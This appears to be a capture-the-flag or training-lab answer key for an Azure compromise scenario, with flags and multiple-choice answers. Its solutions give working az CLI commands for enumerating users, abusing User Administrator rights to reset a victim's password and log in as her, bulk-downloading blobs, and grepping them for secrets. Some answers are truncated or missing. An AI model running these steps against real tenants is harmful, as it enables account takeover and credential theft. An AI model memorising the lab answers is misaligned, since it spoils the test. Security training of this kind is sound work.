SIMULATION
You've discovered that the compromised user holds directory-level privileges. Enumerate how this role can be abused to compromise another user in the directory. What is the Job Title attribute of the compromised target user?
Flag{92c8bfe4a73f48a6bd94e62fca2179dd}
Detailed Solution:
As the second compromised user, enumerate directory users:
az ad user list --output table
Use a cleaner query to show names, UPNs, and job titles:
az ad user list \
--query '[].{DisplayName:displayName,UPN:userPrincipalName,JobTitle:jobTitle}' \
--output table
You should identify a target user whose profile contains a flag in the jobTitle attribute.
The important target is:
lila.nguyen@azuresecops.onmicrosoft.com
Her jobTitle field contains:
Flag{92c8bfe4a73f48a6bd94e62fca2179dd}
Because the compromised user has User Administrator, you can reset this target user's password and later authenticate as her.
Final Answer:
Flag{92c8bfe4a73f48a6bd94e62fca2179dd}
================
SIMULATION
Carefully enumerate the accessible Azure Blob Container to locate a file containing credentials for an App Registration within the tenant. What is the Application/Client ID of the discovered App Registration?
The answer is the clientId, appId, or applicationId value inside the credential file downloaded from the sensitive-files container.
Detailed Solution:
List blobs inside the accessible container:
az storage blob list \
--account-name excaliburstore \
--container-name sensitive-files \
--sas-token '$SAS' \
--query '[].name' \
--output table
Download all files locally:
mkdir blobloot
az storage blob download-batch \
--account-name excaliburstore \
--source sensitive-files \
--destination blobloot \
--sas-token '$SAS'
Search the downloaded files for application credentials:
grep -RniE 'clientId|appId|applicationId|clientSecret|tenantId|secret|password' blobloot
On Windows PowerShell:
Select-String -Path .\blobloot\* -Pattern 'clientId|appId|applicationId|clientSecret|tenantId|secret|password' -CaseSensitive:$false
A typical file may look like this:
{
'tenantId': 'f015f36d-c07f-41fb-9bde-fffc3a22ee8b',
'clientId': '
'clientSecret': '
}
The clientId / appId value is the answer.
Final Answer:
Use the clientId / appId value found in the blob credential file.
================
You find a SAS token in a table entity. The token starts with:
?sv=2025-01-05&ss=b&srt=sco&sp=rl&se=2026-08-01T00:00:00Z
Which permissions does sp=rl grant?
A. Read and List B. Read and Write C. Write and Delete D. List and Delete
Detailed Solution:
In Azure Storage SAS tokens, sp means signed permissions.
For blob/container access:
r = read l = list w = write d = delete c = create a = add
Given:
sp=rl
The permissions are:
Read + List
Correct answer:
After authenticating as the service principal, enumerate its assigned Azure RBAC role. Which role does it have?
A. Reader B. Contributor C. Storage Account Contributor D. Owner
Detailed Solution:
Resolve the service principal object ID:
az ad sp show \ --id c5fba7db-5e61-45bc-8944-3cd457bb19c2 \ --query id \ --output tsv
Then list role assignments:
SP_OBJECT_ID=$(az ad sp show \ --id c5fba7db-5e61-45bc-8944-3cd457bb19c2 \ --query id \ --output tsv) az role assignment list \ --assignee '$SP_OBJECT_ID' \ --all \ --output table
Expected output:
Principal Role Scope ------------------------------------ ----------- ---------------------------------------- <sp-object-id> Contributor /subscriptions/5d8e44ac-...
Correct answer:
SIMULATION
Using the Azure access of the second compromised user, perform lateral movement within the environment to discover sensitive information. What is the flag uncovered during this activity?
The answer is the flag found after compromising the target user and enumerating her accessible Azure resources, usually storage/table data.
Detailed Solution:
Since the second compromised user is a User Administrator, abuse that role to reset the password of the target user.
az ad user update \
--id lila.nguyen@azuresecops.onmicrosoft.com \
--password 'NewP@ssw0rd12345!' \
--force-change-password-next-sign-in false
Now authenticate as the target user.
az login -u lila.nguyen@azuresecops.onmicrosoft.com -p 'NewP@ssw0rd12345!'
Confirm the login context:
az account show
Check what Azure resources this user can see:
az resource list --output table
Check role assignments:
az role assignment list --all --output table
If the user has storage data-plane permissions, enumerate storage accounts:
az storage account list --output table
If the storage account is known from the lab chain, use it directly:
az storage table list \
--account-name excaliburstore \
--auth-mode login \
--output table
Query each table:
az storage entity query \
--account-name excaliburstore \
--table-name <table-name> \
--auth-mode login \
--output json
A faster method:
for table in $(az storage table list --account-name excaliburstore --auth-mode login --query '[].name' -o tsv); do
echo '===== $table ====='
az storage entity query \
--account-name excaliburstore \
--table-name '$table' \
--auth-mode login \
--output table
done
Search the output for:
Flag
SAS
token
container
storage
secret
The flag discovered in this stage is the Q7 answer.
Final Answer:
Use the Flag{...} value returned from the accessible table/storage data after logging in as lila.nguyen@azuresecops.onmicrosoft.com.
================
Currently there are no comments in this discussion, be the first to comment!